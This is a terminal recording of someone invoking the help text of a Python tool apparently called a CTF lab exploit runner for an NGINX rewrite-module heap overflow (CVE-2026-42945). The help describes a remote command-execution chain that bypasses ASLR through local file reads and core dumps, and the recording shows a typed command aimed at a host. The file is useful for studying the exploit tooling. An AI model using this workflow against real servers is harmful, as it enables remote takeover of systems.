{"version":3,"term":{"cols":156,"rows":47,"type":"xterm-256color","version":"iTerm2 3.6.10","theme":{"fg":"#8df77a","bg":"#000000","palette":"#000000:#b93019:#52c037:#c7c53e:#0c24c0:#ba3ec1:#53c3c6:#c7c7c7:#686868:#f0776d:#8df77a:#fffc7f:#6a71f7:#f17ff9:#8efafe:#ffffff"}},"timestamp":1778818511,"env":{"SHELL":"/opt/homebrew/bin/fish"}}
[0.114, "o", "\u001b]1337;RemoteHost=hamid@MacBook-Pro.local\u0007\u001b]1337;CurrentDir=/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007"]
[0.000, "o", "\u001b]1337;ShellIntegrationVersion=19;shell=fish\u0007"]
[0.003, "o", "\u001b[?u\u001b[>0q\u001b]11;?\u001b\\\u001b[?1049h\u001bP+q696e646e\u001b\\\u001bP+q71756572792d6f732d6e616d65\u001b\\\u001b[?1049l\u001b[0c"]
[0.058, "o", "\r"]
[0.000, "o", "\u001b[38;2;102;102;102m"]
[0.004, "o", "Darwin MacBook-Pro.local 25.5.0 arm64\r\n"]
[0.002, "o", " 6:15  up 1 day, 17:44, 15 users, load averages: 3.70 3.84 4.09\r\n"]
[0.001, "o", "\u001b[m"]
[0.012, "o", "\u001b[6 q"]
[0.001, "o", "\u001b]7;file://MacBook-Pro.local/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007"]
[0.082, "o", "\u001b]0;fish ~/D/t/n/Nginx-Rift\u0007\u001b[m\u001b]11;?\u001b\\\u001b[6n\u001b[0c\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "\u001b]133;A;click_events=1\u001b\\\u001b]133;D;0\u0007\u001b]1337;RemoteHost=hamid@MacBook-Pro.local\u0007\u001b]1337;CurrentDir=/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007\u001b]133;A\u0007\u001b[m\u001b[38;2;153;153;153;48;2;51;51;51m ~/D/t/n/\u001b[38;2;255;255;255;48;2;51;51;51;1mNginx-Rift \u001b[m\u001b[38;2;12;72;1;48;2;173;220;16m\u001b[38;2;51;51;51m \u001b[38;2;12;72;1m ctf-remote-aslr-lfi … \u001b[m\u001b[m\u001b[38;2;173;220;16m \u001b[m\u001b]133;B\u0007\u001b]133;B\u0007\u001b[38;2;178;178;178m\u001b[K\r\u001b[48C"]
[2.465, "o", "p\r\u001b[49C"]
[0.000, "o", "\b\u001b[38;2;255;34;34mp\u001b[38;2;178;178;178m\r\u001b[49C"]
[0.004, "o", "\u001b[38;2;102;102;102mython ./demo_ctf_exploit_v1_9.py --host 192.168.1.205:19321 --cmd id --clear\u001b[38;2;178;178;178m\r\u001b[49C"]
[0.333, "o", "\u001b[38;2;255;34;34my\u001b[38;2;102;102;102mthon ./demo_ctf_exploit_v1_9.py --host 192.168.1.205:19321 --cmd id --clear\u001b[38;2;178;178;178m\r\u001b[50C"]
[0.000, "o", "\u001b[2D\u001b[39mpy\u001b[38;2;102;102;102mthon ./demo_ctf_exploit_v1_9.py --host 192.168.1.205:19321 --cmd id --clear\u001b[38;2;178;178;178m\r\u001b[50C"]
[0.276, "o", "\u001b[39mt\u001b[38;2;102;102;102mhon ./demo_ctf_exploit_v1_9.py --host 192.168.1.205:19321 --cmd id --clear\u001b[38;2;178;178;178m\r\u001b[51C"]
[0.001, "o", "\u001b[3D\u001b[38;2;255;34;34mpyt\u001b[38;2;102;102;102mhon ./demo_ctf_exploit_v1_9.py --host 192.168.1.205:19321 --cmd id --clear\u001b[38;2;178;178;178m\r\u001b[51C"]
[0.058, "o", "\u001b[38;2;255;34;34mh\u001b[38;2;102;102;102mon ./demo_ctf_exploit_v1_9.py --host 192.168.1.205:19321 --cmd id --clear\u001b[38;2;178;178;178m\r\u001b[52C"]
[0.133, "o", "\u001b[38;2;255;34;34mo\u001b[38;2;102;102;102mn ./demo_ctf_exploit_v1_9.py --host 192.168.1.205:19321 --cmd id --clear\u001b[38;2;178;178;178m\r\u001b[53C"]
[0.093, "o", "\u001b[38;2;255;34;34mn\u001b[38;2;102;102;102m ./demo_ctf_exploit_v1_9.py --host 192.168.1.205:19321 --cmd id --clear\u001b[38;2;178;178;178m\r\u001b[54C"]
[0.001, "o", "\u001b[6D\u001b[39mpython\u001b[38;2;102;102;102m ./demo_ctf_exploit_v1_9.py --host 192.168.1.205:19321 --cmd id --clear\u001b[38;2;178;178;178m\r\u001b[54C"]
[0.419, "o", "\u001b[6Dpython ./demo_ctf_exploit_v1_9.py --host 192.168.1.205:19321 --cmd id --clear\r\u001b[125C"]
[0.000, "o", "\r\u001b[125C"]
[0.000, "o", "\u001b[77D\u001b[39mpython\u001b[38;2;178;178;178m \u001b[38;2;204;204;255;4m./demo_ctf_exploit_v1_9.py\u001b[38;2;178;178;178;24m \u001b[38;2;204;204;255m--host\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m192.168.1.205:19321\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m--cmd\u001b[38;2;178;178;178m \u001b[38;2;204;204;255mid\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m--clear\u001b[38;2;178;178;178m\r\u001b[125C"]
[0.595, "o", "\b\u001b[K\r\u001b[124C"]
[0.503, "o", "\b\u001b[K\r\u001b[123C"]
[0.080, "o", "\b\u001b[K\r\u001b[122C"]
[0.085, "o", "\b\u001b[K\r\u001b[121C"]
[0.088, "o", "\b\u001b[K\r\u001b[120C"]
[0.083, "o", "\b\u001b[K\r\u001b[119C"]
[0.077, "o", "\b\u001b[K\r\u001b[118C"]
[0.087, "o", "\b\u001b[K\r\u001b[117C"]
[0.085, "o", "\b\u001b[K\r\u001b[116C"]
[0.095, "o", "\b\u001b[K\r\u001b[115C"]
[0.085, "o", "\b\u001b[K\r\u001b[114C"]
[0.067, "o", "\b\u001b[K\r\u001b[113C"]
[0.099, "o", "\b\u001b[K\r\u001b[112C"]
[0.069, "o", "\b\u001b[K\r\u001b[111C"]
[0.083, "o", "\b\u001b[K\r\u001b[110C"]
[0.083, "o", "\b\u001b[K\r\u001b[109C"]
[0.088, "o", "\b\u001b[K\r\u001b[108C"]
[0.078, "o", "\b\u001b[K\r\u001b[107C"]
[0.083, "o", "\b\u001b[K\r\u001b[106C"]
[0.083, "o", "\b\u001b[K\r\u001b[105C"]
[0.101, "o", "\b\u001b[K\r\u001b[104C"]
[0.083, "o", "\b\u001b[K\r\u001b[103C"]
[0.069, "o", "\b\u001b[K\r\u001b[102C"]
[0.080, "o", "\b\u001b[K\r\u001b[101C"]
[0.084, "o", "\b\u001b[K\r\u001b[100C"]
[0.083, "o", "\b\u001b[K\r\u001b[99C"]
[0.084, "o", "\b\u001b[K\r\u001b[98C"]
[0.083, "o", "\b\u001b[K\r\u001b[97C"]
[0.090, "o", "\b\u001b[K\r\u001b[96C"]
[0.077, "o", "\b\u001b[K\r\u001b[95C"]
[0.084, "o", "\b\u001b[K\r\u001b[94C"]
[0.090, "o", "\b\u001b[K\r\u001b[93C"]
[0.080, "o", "\b\u001b[K\r\u001b[92C"]
[0.094, "o", "\b\u001b[K\r\u001b[91C"]
[0.087, "o", "\b\u001b[K\r\u001b[90C"]
[0.065, "o", "\b\u001b[K\r\u001b[89C"]
[0.089, "o", "\b\u001b[K\r\u001b[88C"]
[0.078, "o", "\b\u001b[K\r\u001b[87C"]
[0.083, "o", "\b\u001b[K\r\u001b[86C"]
[0.355, "o", "\b\u001b[K\r\u001b[85C"]
[0.251, "o", "\u001b[38;2;204;204;255me\u001b[38;2;178;178;178m\r\u001b[86C"]
[0.000, "o", "\u001b[38;2;102;102;102mlp\u001b[38;2;178;178;178m\r\u001b[86C"]
[0.185, "o", "\u001b[38;2;204;204;255ml\u001b[38;2;102;102;102mp\u001b[38;2;178;178;178m\r\u001b[87C"]
[0.047, "o", "\u001b[38;2;204;204;255mp\u001b[38;2;178;178;178m\r\u001b[88C"]
[0.000, "o", "\r\u001b[88C"]
[0.453, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u"]
[0.000, "o", "\r\u001b[88C\r\n\u001b[m"]
[0.000, "o", "\u001b]133;C;cmdline_url=python%20./demo_ctf_exploit_v1_9.py%20--help\u0007"]
[0.000, "o", "\u001b]133;C;\r\u0007"]
[0.000, "o", "\u001b[2 q"]
[0.001, "o", "\u001b]0;python ~/D/t/n/Nginx-Rift\u0007\u001b[m\r"]
[0.143, "o", "\u001b[1;36musage:\u001b[0m demo_ctf_exploit_v1_9.py \u001b[32m--host\u001b[0m HOST \u001b[32m--cmd\u001b[0m CMD [options]\r\n\r\nv1.9 remote lab runner for CVE-2026-42945: NGINX rewrite-module heap buffer overflow.\r\nBug class: rewrite/set args-escaping length/copy mismatch in vulnerable rewrite/set configurations.\r\nTarget model: same-port NGINX/PHP-FPM lab with /api/..., /lfi.php, /phpinfo.php, and an HTTP/2 victim connection.\r\n\r\n\u001b[1;34moptions:\u001b[0m\r\n  \u001b[32m-h\u001b[0m, \u001b[32m--help\u001b[0m            show this help message and exit\r\n  \u001b[32m--advanced-help\u001b[0m       show tuning/debug and custom-vector options\r\n\r\n\u001b[1;34mtarget:\u001b[0m\r\n  \u001b[32m--host\u001b[0m HOST           target host, optionally HOST:PORT\r\n  \u001b[32m--port\u001b[0m PORT           target port override/fallback\r\n  \u001b[32m--target-profile\u001b[0m {lab,generic}\r\n                        use 'generic' to skip this fork's lab-specific nginx config assertions\r\n  \u001b[32m--file-read-template\u001b[0m FILE_READ_TEMPLATE\r\n                        custom file-read URL template; supports {host}, {port}, {path_url}, {offset}, {l"]
[0.000, "o", "ength}, {range_query}\r\n\r\n\u001b[1;34moperation:\u001b[0m\r\n  \u001b[32m--cmd\u001b[0m CMD             shell command to run and capture in the marker file\r\n  \u001b[32m--rounds\u001b[0m ROUNDS       maximum independent full exploit attempts before giving up\r\n\r\n\u001b[1;34moutput:\u001b[0m\r\n  \u001b[32m--artifact-dir\u001b[0m ARTIFACT_DIR\r\n                        JSON artifact directory\r\n  \u001b[32m-v\u001b[0m, \u001b[32m--verbose\u001b[0m         print detailed probe and candidate trace\r\n  \u001b[32m--fast\u001b[0m                disable narration pauses\r\n  \u001b[32m--clear\u001b[0m               clear the terminal before starting\r\n  \u001b[32m--no-color\u001b[0m            disable colored output\r\n\r\n\u001b[1;34mDefault path:\u001b[0m\r\n  Provide \u001b[32m--host\u001b[0m and \u001b[32m--cmd\u001b[0m. The runner fingerprints the target, uses the\r\n  core/LFI ASLR-bypass workflow, verifies command output through the marker,\r\n  and writes a JSON artifact.\r\n\r\n\u001b[1;34mRounds:\u001b[0m\r\n  One round is one independent full exploit attempt: derive current target\r\n  facts, collect usable crash/core candidates, try candidate cleanup pointers,\r\n  then ver"]
[0.000, "o", "ify the marker. Increase \u001b[32m--rounds\u001b[0m only when the lab is noisy.\r\n\r\n\u001b[1;34mScope:\u001b[0m\r\n  This is the ASLR-enabled research chain in this fork. It intentionally keeps\r\n  the original PoC separate and depends on the lab's PHP local-file-read and\r\n  readable nginx worker core primitive.\r\n\r\n\u001b[1;34mCustom file-read vectors:\u001b[0m\r\n  The default vector is /lfi.php?file=<path>&offset=<n>&length=<n>. For another\r\n  CTF app, pass \u001b[32m--file-read-template\u001b[0m. Example:\r\n  \u001b[32m--file-read-template\u001b[0m 'http://{host}:{port}/download?path={path_url}{range_query}'\r\n\r\nUpstream fixed releases: NGINX OSS 1.30.1 / 1.31.0; NGINX Plus R36 P4 / R35 P2 / R32 P6\r\n\r\n\u001b[1;34mAdvanced controls:\u001b[0m\r\n  Use \u001b[32m--advanced-help\u001b[0m for calibration, negative-test, and low-level exploit\r\n  tuning controls.\r\n"]
[0.005, "o", "\u001b]133;D;0\u0007"]
[0.000, "o", "\u001b[6 q"]
[0.000, "o", "\u001b[?25h"]
[0.000, "o", "\u001b[2m⏎\u001b[m                                                                                                                                                           \r⏎ \r\u001b[K"]
[0.000, "o", "\u001b]7;file://MacBook-Pro.local/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007"]
[0.076, "o", "\u001b]0;fish ~/D/t/n/Nginx-Rift\u0007\u001b[m\u001b]11;?\u001b\\\u001b[6n\u001b[0c\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "\u001b]133;A;click_events=1\u0007\u001b]133;D;0\u0007\u001b]1337;RemoteHost=hamid@MacBook-Pro.local\u0007\u001b]1337;CurrentDir=/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007\u001b]133;A\u0007\u001b[m\u001b[38;2;153;153;153;48;2;51;51;51m ~/D/t/n/\u001b[38;2;255;255;255;48;2;51;51;51;1mNginx-Rift \u001b[m\u001b[38;2;12;72;1;48;2;173;220;16m\u001b[38;2;51;51;51m \u001b[38;2;12;72;1m ctf-remote-aslr-lfi … \u001b[m\u001b[m\u001b[38;2;173;220;16m \u001b[m\u001b]133;B\u0007\u001b]133;B\u0007\u001b[38;2;178;178;178m\u001b[K\r\u001b[151C\u001b[38;2;102;102;102m147ms\u001b[38;2;178;178;178m\u001b[38;2;102;102;102m\u001b[m\r\u001b[151C\r\u001b[48C"]
[7.754, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u"]
[0.001, "o", "\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "python ./demo_ctf_exploit_v1_9.py --help\r\u001b[151C\u001b[38;2;102;102;102m147ms\u001b[38;2;178;178;178m\u001b[38;2;102;102;102m\u001b[m\r\u001b[151C\r\u001b[88C"]
[0.000, "o", "\u001b[40D\u001b[39mpython\u001b[38;2;178;178;178m \u001b[38;2;204;204;255;4m./demo_ctf_exploit_v1_9.py\u001b[38;2;178;178;178;24m \u001b[38;2;204;204;255m--help\u001b[38;2;178;178;178m\r\u001b[151C\u001b[38;2;102;102;102m147ms\u001b[38;2;178;178;178m\u001b[38;2;102;102;102m\u001b[m\r\u001b[151C\r\u001b[88C"]
[0.761, "o", "\b\u001b[K\r\u001b[151C\u001b[38;2;102;102;102m147ms\u001b[38;2;178;178;178m\u001b[38;2;102;102;102m\u001b[m\r\u001b[151C\r\u001b[87C"]
[0.192, "o", "\b\u001b[K\r\u001b[151C\u001b[38;2;102;102;102m147ms\u001b[38;2;178;178;178m\u001b[38;2;102;102;102m\u001b[m\r\u001b[151C\r\u001b[86C"]
[0.184, "o", "\b\u001b[K\r\u001b[151C\u001b[38;2;102;102;102m147ms\u001b[38;2;178;178;178m\u001b[38;2;102;102;102m\u001b[m\r\u001b[151C\r\u001b[85C"]
[0.182, "o", "\b\u001b[K\r\u001b[151C\u001b[38;2;102;102;102m147ms\u001b[38;2;178;178;178m\u001b[38;2;102;102;102m\u001b[m\r\u001b[151C\r\u001b[84C"]
[0.461, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u"]
[0.120, "o", "\u001b[?1049h"]
[0.015, "o", "\u001b[?7l\u001b[?25l\u001b[?1000h\u001b[?1002h\u001b[?1006h\u001b[?2004h\u001b[46A\u001b[G\u001b[K\u001b[42B\r\u001b[;38;5;59m╭\u001b[0m\u001b[;38;5;59m──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\u001b[;38;5;59m╮\u001b[0m\u001b[1B\r\u001b[;38;5;59m│ \u001b[0m\r\u001b[154C\u001b[;38;5;59m │\u001b[0m\u001b[1B\r\u001b[;38;5;59m│ \u001b[0m\r\u001b[154C\u001b[;38;5;59m │\u001b[0m\u001b[1B\r\u001b[;38;5;59m│ \u001b[0m\r\u001b[154C\u001b[;38;5;59m │\u001b[0m\u001b[1B\r\u001b[;38;5;59m╰\u001b[0m\u001b[;38;5;59m─────────────────────────────────────────────────────────────────────────────────────────"]
[0.000, "o", "─────────────────────────────────────────────────────────────────\u001b[0m\u001b[;38;5;59m╯\u001b[0m\u001b[3A\r\u001b[2C\r\u001b[2C\u001b[;m                                                                                                                                                        \r\u001b[2C\u001b[1B\r\u001b[2C\u001b[;m                                                                                                                                                        \r\u001b[2C\u001b[1B\r\u001b[2C\u001b[;m                                                                                                                                                        \r\u001b[2C\u001b[2A\r\u001b[2C\u001b[43A\r\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                          "]
[0.000, "o", "                                                  \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                      "]
[0.000, "o", "                      \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r"]
[0.000, "o", "\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                        "]
[0.000, "o", "                                                                                                                                    \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                    "]
[0.001, "o", "                                                                                                        \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                "]
[0.000, "o", "                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                            "]
[0.000, "o", "                                                \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[1B\r\u001b[;m                                                                                                                                                            \r\u001b[41A\r\u001b[41B\r\u001b[;m                                                                                                                                                            \r\u001b[;1;38;5;110mHistory>\u001b[0m\u001b[;38;5;110m \u001b[0m\u001b[;1mpython ./demo_ctf_exploit_v1_9.py --\u001b[0m\u001b[;1m\u001b[0m\u001b[1A\r\u001b[;1;38;5;148m⠦\u001b[0m\u001b[;m \u001b[;38;5;144m0/0 (0)\u001b[0m\u001b[;38;5;59m \u001b[0m\u001b[;38;5;59m──────────────────────────────────────────"]
[0.000, "o", "───────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\u001b[;m \u001b[1B\r\u001b[45C\u001b[1A\r\u001b[;m \u001b[;m \u001b[;38;5;144m0/26171 (0)\u001b[0m\u001b[;38;5;59m \u001b[0m\u001b[;38;5;59m─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────\u001b[0m\u001b[;m \u001b[1B\r\u001b[45C\u001b[?25h\u001b[?7h"]
[0.003, "o", "\u001b[?7l\u001b[?25l\u001b[2A\r\u001b[;1;38;5;161;48;5;236m▌\u001b[0m\u001b[;48;5;236m \u001b[0m\u001b[;1;38;5;254;48;5;236m05-15 06:15:20 │ \u001b[0m\u001b[;1;38;5;151;48;5;236mp\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236my\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mt\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mh\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mo\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mn\u001b[0m\u001b[;1;38;5;254;48;5;236m \u001b[0m\u001b[;1;38;5;151;48;5;236m.\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m/\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236md\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236me\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mm\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mo\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m_\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mc\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mt\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mf\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m_\u001b[0m\u001b[;1;3"]
[0.000, "o", "8;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236me\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mx\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mp\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236ml\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mo\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mi\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mt\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m_\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mv\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m1\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m_\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m9\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m.\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236mp\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236my\u001b[0m\u001b[;1;38;5;254;48;5;236m \u001b[0m\u001b[;1;38;5;151;48;5;236m-\u001b[0m\u001b[;1;38;5;254;48;5;236m\u001b[0m\u001b[;1;38;5;151;48;5;236m-\u001b[0m\u001b[;1;38;5;254;48;5;236mhelp\u001b[0m\u001b[;m                                                           "]
[0.000, "o", "                                     \r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;38;5;236m▌\u001b[0m\u001b[;m \u001b[;m05-15 06:13:10 │ \u001b[0m\u001b[;38;5;108mp\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108my\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mt\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mh\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mo\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mn\u001b[0m\u001b[;m \u001b[0m\u001b[;38;5;108m.\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m/\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108md\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108me\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mm\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mo\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m_\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mc\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mt\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mf\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m_\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108me\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mx\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mp\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108ml\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mo\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mi\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mt\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m_\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mv\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m1\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m_\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m9\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m.\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108mp\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108my\u001b[0m\u001b[;m \u001b[0m\u001b[;38;5;108m-\u001b[0m\u001b[;m\u001b[0m\u001b[;38;5;108m-\u001b[0m\u001b[;mhost 192.168.1.205:19321 --cmd id --clear\u001b[0m\u001b[;m               "]
[0.000, "o", "                                            \r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                           "]
[0.000, "o", "                                                                                                                                 \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                              "]
[0.000, "o", "                              \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                        "]
[0.000, "o", "                                                                                                                    \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                           "]
[0.000, "o", "                 \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                     "]
[0.000, "o", "                                                                                                       \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                            \r\r\u001b[155C\u001b[;m \r\u001b[155C\u001b[1A\r\u001b[;m                                                                                                                                                        "]
